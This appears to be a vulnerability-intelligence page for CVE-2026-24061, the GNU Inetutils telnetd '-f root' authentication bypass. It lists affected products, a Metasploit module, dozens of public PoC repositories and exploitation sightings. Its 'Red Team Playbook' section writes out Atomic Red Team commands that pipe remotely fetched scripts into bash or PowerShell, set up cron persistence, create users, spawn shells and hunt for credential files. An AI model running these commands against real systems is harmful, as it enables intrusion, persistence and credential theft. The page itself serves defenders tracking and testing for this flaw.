CVE-2026-24061
Overview
This vulnerability is an authentication bypass in the telnetd daemon of GNU Inetutils versions up to 2.7. The root cause lies in improper handling of the USER environment variable, where passing a specially crafted value "-f root" bypasses normal authentication checks. The affected component is the telnetd service responsible for remote login sessions.
Vulnerability Description
telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.
Impact
An unauthenticated remote attacker can gain root-level access on the affected system by exploiting this flaw, effectively bypassing all authentication controls. This allows full system compromise including arbitrary command execution with administrative privileges. No prior credentials or user interaction are required, enabling direct unauthorized access to sensitive system resources and potential lateral movement within a network environment.
Solution
Upgrade GNU Inetutils to a version later than 2.7 where this vulnerability is addressed, as recommended by the GNU project advisory available at https://www.gnu.org/software/inetutils/. Debian users should apply security updates for Debian Linux 11.0 as provided by the Debian security team. Refer to the openwall security mailing list announcements from January 20, 2026, for detailed patch instructions and mitigation steps.
EPSS vs KEV Prediction — Evolution (30 days)
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Gnu | Inetutils | All |
cpe:2.3:a:gnu:inetutils:*:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 11.0 |
cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061
exploits/linux/telnet/gnu_inetutils_auth_bypass
|
jheysel-r7, Kyu Neushwaistein | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation | aliguliyev | local | linux | - | View |
GitHub PoCs (82)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
jacubes/CVE-2026-24061
CVE-2026-24061 exploit PoC
|
jacubes | 826 | 15 | 2026-03-08 | View |
|
SafeBreach-Labs/CVE-2026-24061
Exploitation of CVE-2026-24061
|
SafeBreach-Labs | 208 | 47 | 2026-01-22 | View |
|
JayGLXR/CVE-2026-24061-POC
|
JayGLXR | 68 | 10 | 2026-01-22 | View |
|
parameciumzhang/Tell-Me-Root
基于cve-2026-24061 telnet远程认证绕过漏洞的批量检测利用工具
|
parameciumzhang | 21 | 4 | 2026-01-22 | View |
|
ZeroDayEvil/CVE-2026-24061
|
ZeroDayEvil | 22 | 2 | 2026-09-28 | View |
|
ekomsSavior/telnet_scan
scanner/exploiter CVE-2026-24061 & CVE-2026-32746
|
ekomsSavior | 12 | 6 | 2026-03-26 | View |
|
Lingzesec/CVE-2026-24061-GUI
CVE-2026-24061 GNU Inetutils telnetd 身份验证绕过漏洞检测与利用 GUI 工具
|
Lingzesec | 17 | 1 | 2026-01-26 | View |
|
Chocapikk/CVE-2026-24061
|
Chocapikk | 12 | 3 | 2026-01-22 | View |
|
TryA9ain/CVE-2026-24061
CVE-2026-24061 Batch Scanning Tool
|
TryA9ain | 10 | 4 | 2026-01-22 | View |
|
leonjza/inetutils-telnetd-auth-bypass
A small docker lab to play with cve-2026-24061, the inetutils-telnetd authentication bypass.
|
leonjza | 12 | 0 | 2026-01-21 | View |
|
0p5cur/CVE-2026-24061-POC
CVE-2026-24061's poc : a critical authentication bypass in telnetd leading to RCE as root Affects systems with telnetd v...
|
0p5cur | 8 | 3 | 2026-01-24 | View |
|
h3athen/CVE-2026-24061
CVE-2026-24061 - Exploit
|
h3athen | 8 | 1 | 2026-01-22 | View |
|
tc4dy/CVE-2026-24061-PoC-Exploit
CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass Exploit - Full Control with CRLF injection via NEW_ENVIRON leads to a...
|
tc4dy | 8 | 0 | 2026-06-06 | View |
|
sh4den/CVE-2026-24061
Proof of Concept: CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils-telnetd allowing una...
|
sh4den | 6 | 1 | 2026-01-23 | View |
|
SystemVll/CVE-2026-24061
Proof of Concept: CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils-telnetd allowing una...
|
SystemVll | 5 | 1 | 2026-01-23 | View |
|
franckferman/CVE-2026-24061
GNU InetUtils telnetd - Unauthenticated Remote Root via NEW-ENVIRON Variable Injection.
|
franckferman | 5 | 0 | 2026-02-02 | View |
|
shivam-bathla/CVE-2026-24061-setup
Docker setup for CVE-2026-24061
|
shivam-bathla | 4 | 1 | 2026-01-24 | View |
|
balgan/CVE-2026-24061
inetutils-telnetd Authentication Bypass - working
|
balgan | 4 | 0 | 2026-01-23 | View |
|
ibrahmsql/CVE-2026-24061-PoC
CVE-2026-24061 PoC and walkthrough
|
ibrahmsql | 4 | 0 | 2026-02-02 | View |
|
madfxr/Twenty-Three-Scanner
CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass
|
madfxr | 4 | 0 | 2026-01-24 | View |
|
K3ysTr0K3R/CVE-2026-24061
A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass
|
K3ysTr0K3R | 3 | 0 | 2026-06-08 | View |
|
xuemian168/CVE-2026-24061
|
xuemian168 | 3 | 0 | 2026-01-23 | View |
|
duy-31/CVE-2026-24061---telnetd
Bypass d’authentification Telnet menant à un accès root
|
duy-31 | 2 | 1 | 2026-01-22 | View |
|
stoerti2/Abyssal
Abyssal is a high-performance Telnet vulnerability scanner for CVE-2026-24061, delivering root shells on vulnerable sys...
|
stoerti2 | 0 | 2 | 2026-07-10 | View |
|
RStephanH/vuln-deb
A vulnerable Debian-based VM for practising exploitation of CVE-2026-24061
|
RStephanH | 2 | 0 | 2026-04-13 | View |
|
MY0723/GNU-Inetutils-telnet-CVE-2026-24061-
GNU Inetutils telnet远程认证绕过漏洞(CVE-2026-24061),该漏洞源于 GNU Inetutils telnetd 组件中对环境变量处理不当,攻击者可利用该漏洞,通过构造恶意的 USER 环境变量并发送至受影响...
|
MY0723 | 1 | 1 | 2026-01-28 | View |
|
dotelpenguin/telnetd_CVE-2026-24061_tester
Checks for CVE-2026-24061 Telnetd exploit
|
dotelpenguin | 1 | 1 | 2026-01-28 | View |
|
yanxinwu946/CVE-2026-24061--telnetd
GNU InetUtils telnetd 远程身份认证绕过漏洞(CVE-2026-24061),此漏洞主要影响 telnetd 在调用系统 /usr/bin/login 程序时,未对从客户端 USER 环境变量传入的用户名做过滤,直接拼接...
|
yanxinwu946 | 2 | 0 | 2026-01-22 | View |
|
X-croot/CVE-2026-24061_POC
POC Script for CVE-2026-24061 (GNU Telnetd Exploit)
|
X-croot | 2 | 0 | 2026-02-01 | View |
|
Mr-Zapi/CVE-2026-24061
Nuclei template for CVE-2026-24061
|
Mr-Zapi | 1 | 1 | 2026-01-24 | View |
|
JakeSwiz/telnet-inetutils-auth-bypass-CVE-2026-24061
This is a simple PoC that allows you to highlight the severity of the ongoing and actively exploited Telnet bug that is ...
|
JakeSwiz | 1 | 0 | 2026-01-31 | View |
|
infat0x/CVE-2026-24061
CVE-2026-24061 PoC
|
infat0x | 1 | 0 | 2026-01-25 | View |
|
FurkanKAYAPINAR/CVE-2026-24061-telnet2root
|
FurkanKAYAPINAR | 1 | 0 | 2026-01-27 | View |
|
setuju/telnetd
Idk what to do here, ill edit soon, but its for the telnetd CVE-2026-24061
|
setuju | 1 | 0 | 2026-03-03 | View |
|
0xBlackash/CVE-2026-24061
CVE-2026-24061
|
0xBlackash | 1 | 0 | 2026-03-09 | View |
|
Mefhika120/Ashwesker-CVE-2026-24061
CVE-2026-24061
|
Mefhika120 | 0 | 1 | 2026-01-25 | View |
|
androidteacher/CVE-2026-24061-PoC-Telnetd
|
androidteacher | 0 | 1 | 2026-01-27 | View |
|
cumakurt/tscan
Telnetd Auth Bypass Scanner (CVE-2026-24061) A Python-based scanner for detecting and exploiting the CVE-2026-24061 vul...
|
cumakurt | 1 | 0 | 2026-01-27 | View |
|
monstertsl/CVE-2026-24061
CVE-2026-24061 漏洞检测工具
|
monstertsl | 1 | 0 | 2026-01-23 | View |
|
Yoksulcvt/CVE-2026-24061-Telnet-Authentication-Bypass
Telnet 2.7 Authentication Bypass and Privilege Escalation | Telnet 2.7 Kimlik doğrulama Zafiyeti Ve Yetki Yükseltme Sald...
|
Yoksulcvt | 0 | 0 | 2026-10-07 | View |
|
skyejacobson/CyberhawksLab-telnetCVE
Writeup/finding of CVE-2026-24061 within the Cyberhawks lab
|
skyejacobson | 0 | 0 | 2026-09-08 | View |
|
Ish3ng0m4/CVE-2026-24061-Telnetd
CVE-2026-24061 GNU Inetutils Telnetd Authentication Bypass
|
Ish3ng0m4 | 0 | 0 | 2026-09-01 | View |
|
iLokaas/CVE-2026-24061-payload
A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass
|
iLokaas | 0 | 0 | 2026-08-28 | View |
|
s-vx/CVE-2026-24061
Auth Bypass in inetutils-telnetd
|
s-vx | 0 | 0 | 2026-07-25 | View |
|
harygovind/CVE-2026-24061
CVE-2026-24061-PoC
|
harygovind | 0 | 0 | 2026-07-06 | View |
|
kyukazamiqq/CVE-2026-24061
|
kyukazamiqq | 0 | 0 | 2026-06-27 | View |
|
Cosm3No1de/htb-orion-writeup
Hack The Box - Orion (Easy) | CVE-2025-32432 & CVE-2026-24061
|
Cosm3No1de | 0 | 0 | 2026-06-27 | View |
|
anxs3c/CVE-2026-24061-GNU-InetUtils-telnetd
GNU-InetUtils-telnetd-Authentication-Bypass-Vulnerability
|
anxs3c | 0 | 0 | 2026-06-08 | View |
|
akpmarcelin/CVE-2026-24061-lab
|
akpmarcelin | 0 | 0 | 2026-06-17 | View |
|
achnouri/CVE-2026-24061-GNU-InetUtils-telnetd
GNU-InetUtils-telnetd-Authentication-Bypass-Vulnerability
|
achnouri | 0 | 0 | 2026-06-08 | View |
|
ahmadsadeeq/TelnetdBypass-
CVE-2026-24061 — GNU InetUtils Telnetd Authentication Bypass Scanner
|
ahmadsadeeq | 0 | 0 | 2026-06-01 | View |
|
r00tuser111/CVE-2026-24061
CVE-2026-24061 环境
|
r00tuser111 | 0 | 0 | 2026-01-23 | View |
|
z3n70/CVE-2026-24061
|
z3n70 | 0 | 0 | 2026-01-24 | View |
|
midox008/CVE-2026-24061
GNU Inetutils telnetd Remote Authentication Bypass
|
midox008 | 0 | 0 | 2026-01-24 | View |
|
BrainBob/CVE-2026-24061
|
BrainBob | 0 | 0 | 2026-01-24 | View |
|
BrainBob/Telnet-TestVuln-CVE-2026-24061
|
BrainBob | 0 | 0 | 2026-01-24 | View |
|
Alter-N0X/CVE-2026-24061-POC
CVE-2026-24061 - GNU InetUtils telnetd authentication bypass POC + Docker lab environment for testing
|
Alter-N0X | 0 | 0 | 2026-01-24 | View |
|
typeconfused/CVE-2026-24061
GNU telnetd service from GNU InetUtils authentication-bypass
|
typeconfused | 0 | 0 | 2026-01-25 | View |
|
ms0x08-dev/CVE-2026-24061-POC
|
ms0x08-dev | 0 | 0 | 2026-01-25 | View |
|
punitdarji/telnetd-cve-2026-24061
|
punitdarji | 0 | 0 | 2026-01-26 | View |
|
XsanFlip/CVE-2026-24061-Scanner
CVE-2026-24061-Scanner by XsanLahci
|
XsanFlip | 0 | 0 | 2026-01-26 | View |
|
LucasPDiniz/CVE-2026-24061
Vulnerability in GNU InetUtils telnetd Enables Remote Root Access
|
LucasPDiniz | 0 | 0 | 2026-01-26 | View |
|
novitahk/Exploit-CVE-2026-24061
Payload CVE-2026-24061
|
novitahk | 0 | 0 | 2026-01-27 | View |
|
Gabs-hub/CVE-2026-24061_Lab
Lab to show the CVE-2026-24061
|
Gabs-hub | 0 | 0 | 2026-01-28 | View |
|
0x7556/CVE-2026-24061
CVE-2026-24061 Telnet RCE Exploit For Linux MacOS Windows
|
0x7556 | 0 | 0 | 2026-01-28 | View |
|
Parad0x7e/CVE-2026-24061
|
Parad0x7e | 0 | 0 | 2026-01-28 | View |
|
buzz075/CVE-2026-24061
Scanner for CVE-2026-24061
|
buzz075 | 0 | 0 | 2026-01-31 | View |
|
obrunolima1910/CVE-2026-24061
🚨 Exploit CVE-2026-24061, a critical remote authentication bypass in GNU inetutils-telnetd, for instant root shell acces...
|
obrunolima1910 | 0 | 0 | 2026-02-03 | View |
|
canpilayda/inetutils-telnetd-cve-2026-24061
|
canpilayda | 0 | 0 | 2026-02-04 | View |
|
killsystema/scan-cve-2026-24061
|
killsystema | 0 | 0 | 2026-02-05 | View |
|
nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector
A passive detection tool for identifying potential exposure to CVE-2026-24061 in GNU inetutils telnet installations
|
nrnw | 0 | 0 | 2026-02-06 | View |
|
tiborscholtz/CVE-2026-24061
A lightweight Docker lab for experimenting with Telnet protocol negotiation, explained in the CVE-2026-24061 exploit, wh...
|
tiborscholtz | 0 | 0 | 2026-02-14 | View |
|
HD0x01/CVE-2026-24061-NSE
The script performs a full Telnet negotiation mirroring the exact byte sequence of a real telnet -a client session.
|
HD0x01 | 0 | 0 | 2026-03-16 | View |
|
lavabyte/telnet-CVE-2026-24061
|
lavabyte | 0 | 0 | 2026-02-04 | View |
|
scumfrog/cve-2026-24061
CVE-2026-24061 PoC
|
scumfrog | 0 | 0 | 2026-02-06 | View |
|
athack-ctf/chall2026-telneted
[AtHack 2026] Pwn challenge about telnetd CVE-2026-24061
|
athack-ctf | 0 | 0 | 2026-02-15 | View |
|
przemytn/CVE-2026-24061
CVE-2026-24061 PoC - telnetd auth bypass
|
przemytn | 0 | 0 | 2026-03-18 | View |
|
SeptembersEND/CVE--2026-24061
A docker image for CVE-2026-24061 in InetUtils telnetd.
|
SeptembersEND | 0 | 0 | 2026-02-02 | View |
|
mbanyamer/CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-
|
mbanyamer | 0 | 0 | 2026-02-18 | View |
|
0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061
This is a simple PoC that allows you to highlight the severity of the ongoing and actively exploited Telnet bug that is ...
|
0xXyc | 0 | 0 | 2026-01-31 | View |
|
Remnant-DB/CVE-2026-24061
CVE-2026-24061 Lab
|
Remnant-DB | 0 | 0 | 2026-03-03 | View |
|
Risma2025/CVE-2026-24061-GNU-InetUtils-telnetd-Authentication-Bypass-Vulnerability
|
Risma2025 | 0 | 0 | 2026-04-05 | View |
Ransomware Groups 1
Threat Feed
35 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, EDRSandBlast, EasyUpload.io, Evilginx, Kali Linux (2304 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Active exploitation confirmed with 56 sighting(s)
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
62 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
for pid in $(pgrep -f 'Runner.Worker|Runner.Listener|runsvc|run.sh' 2>/dev/null); do tr '\0' '\n' < /proc/$pid/environ 2>/dev/null | grep -iE 'env|ssh'; done
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path} -maxdepth 6 -name "#{filename}" -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.aws/#{filename}' -type f 2>/dev/null
find #{file_path} -path '*/.azure/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.docker/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.config/gcloud/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find /root -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
find /etc/kubernetes -name '*.conf' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for filename in #{filenames}; do find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null; done
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
for filename in #{filenames}; do
find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null
done
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find /etc/mysql -name 'my.cnf' -type f #{optional_flags} 2>/dev/null
find /etc/redis -name 'redis.conf' -type f #{optional_flags} 2>/dev/null
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.